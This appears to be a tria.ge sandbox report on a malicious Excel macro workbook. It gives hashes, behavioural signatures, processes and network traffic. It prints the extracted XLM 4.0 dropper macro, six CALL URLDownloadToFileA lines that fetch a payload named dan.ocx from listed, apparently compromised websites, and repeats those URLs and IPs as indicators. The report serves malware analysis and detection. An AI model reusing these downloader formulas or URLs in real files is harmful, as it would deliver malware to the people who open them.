Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
20/11/2024, 23:07 UTC
General
-
Target
e415540a80c90a58bafcacd615a2f3ffb72779732087c6dea42625199b013f2c.xlsm
-
Size
40KB
-
MD5
ef9d311612e0afd8d4050da7b83b810f
-
SHA1
f5e0fae33e0e0efa4e347e690bbc9d1379dda639
-
SHA256
e415540a80c90a58bafcacd615a2f3ffb72779732087c6dea42625199b013f2c
-
SHA512
c9df02e01e27bc076abfb9070917cb0dbf5eeee9ad11d969d7aadeea15568f658044d665cc10a4287102d302da8627a9ef5e9dd8de3f473496f66f7d2028bff6
-
SSDEEP
768:i9oms9O+pOevZCwtxyKfcrND59V+L9Rw4eWrXcTqw0VfWZE:i9oms7tylND59V4jwmXc2RVfW+
Score
10/10
Malware Config
Extracted
Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://queaventurasathya.com/licenses/r903sDTMHYLyn8ykMU/", "..\dan.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://escuelageneraljosedesanmartin.com/tmp/5vJR7J/", "..\dan.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://indianbusinessclub.org/wtzrlyx/Nfisb7Le5JH/", "..\dan.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://cartelac.pt/wp-includes/VJMcayYWquGgVAGa/", "..\dan.ocx")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://axial-ing.fr/old/98WgLPFy5u2Xf/", "..\dan.ocx")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://luape.es/wp-admin/moJpURVz/", "..\dan.ocx")
URLs
xlm40.dropper
https://queaventurasathya.com/licenses/r903sDTMHYLyn8ykMU/
xlm40.dropper
https://escuelageneraljosedesanmartin.com/tmp/5vJR7J/
xlm40.dropper
https://indianbusinessclub.org/wtzrlyx/Nfisb7Le5JH/
xlm40.dropper
https://cartelac.pt/wp-includes/VJMcayYWquGgVAGa/
xlm40.dropper
https://axial-ing.fr/old/98WgLPFy5u2Xf/
xlm40.dropper
https://luape.es/wp-admin/moJpURVz/
Signatures
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e415540a80c90a58bafcacd615a2f3ffb72779732087c6dea42625199b013f2c.xlsm1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
-
DNSqueaventurasathya.comRemote address:8.8.8.8:53Requestqueaventurasathya.comIN AResponse -
DNSescuelageneraljosedesanmartin.comRemote address:8.8.8.8:53Requestescuelageneraljosedesanmartin.comIN AResponse
-
DNSindianbusinessclub.orgRemote address:8.8.8.8:53Requestindianbusinessclub.orgIN AResponse
-
DNScartelac.ptRemote address:8.8.8.8:53Requestcartelac.ptIN AResponsecartelac.ptIN A185.32.190.5
-
DNSaxial-ing.frRemote address:8.8.8.8:53Requestaxial-ing.frIN AResponseaxial-ing.frIN A109.234.166.137
-
GEThttps://axial-ing.fr/old/98WgLPFy5u2Xf/Remote address:109.234.166.137:443RequestGET /old/98WgLPFy5u2Xf/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: axial-ing.fr
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 23:07:45 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Connection: keep-alive
Server: o2switch-PowerBoost-v3
-
DNSluape.esRemote address:8.8.8.8:53Requestluape.esIN AResponse
-
DNSwww.microsoft.comRemote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A95.100.245.144
-
GEThttp://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlRemote address:95.100.245.144:80RequestGET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1078
Content-Type: application/octet-stream
Content-MD5: PjrtHAukbJio72s77Ag5mA==
Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
ETag: 0x8DCFA0366D6C4CA
x-ms-request-id: 2e7868ec-201e-004f-28ee-2b26be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 20 Nov 2024 23:08:16 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV406420a0.0
ms-cv-esi: CASMicrosoftCV406420a0.0
X-RTag: RT
-
185.32.190.5:443cartelac.pttls -
185.32.190.5:443cartelac.pttls
-
185.32.190.5:443cartelac.pttls
-
185.32.190.5:443cartelac.pt
-
109.234.166.137:443https://axial-ing.fr/old/98WgLPFy5u2Xf/tls, http
HTTP Request
GET https://axial-ing.fr/old/98WgLPFy5u2Xf/HTTP Response
404 -
95.100.245.144:80http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlhttp
HTTP Request
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlHTTP Response
200
-
8.8.8.8:53queaventurasathya.comdns
DNS Request
queaventurasathya.com
-
8.8.8.8:53escuelageneraljosedesanmartin.comdns
DNS Request
escuelageneraljosedesanmartin.com
-
8.8.8.8:53indianbusinessclub.orgdns
DNS Request
indianbusinessclub.org
-
8.8.8.8:53cartelac.ptdns
DNS Request
cartelac.pt
DNS Response
185.32.190.5
-
8.8.8.8:53axial-ing.frdns
DNS Request
axial-ing.fr
DNS Response
109.234.166.137
-
8.8.8.8:53luape.esdns
DNS Request
luape.es
-
8.8.8.8:53www.microsoft.comdns
DNS Request
www.microsoft.com
DNS Response
95.100.245.144
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
44KB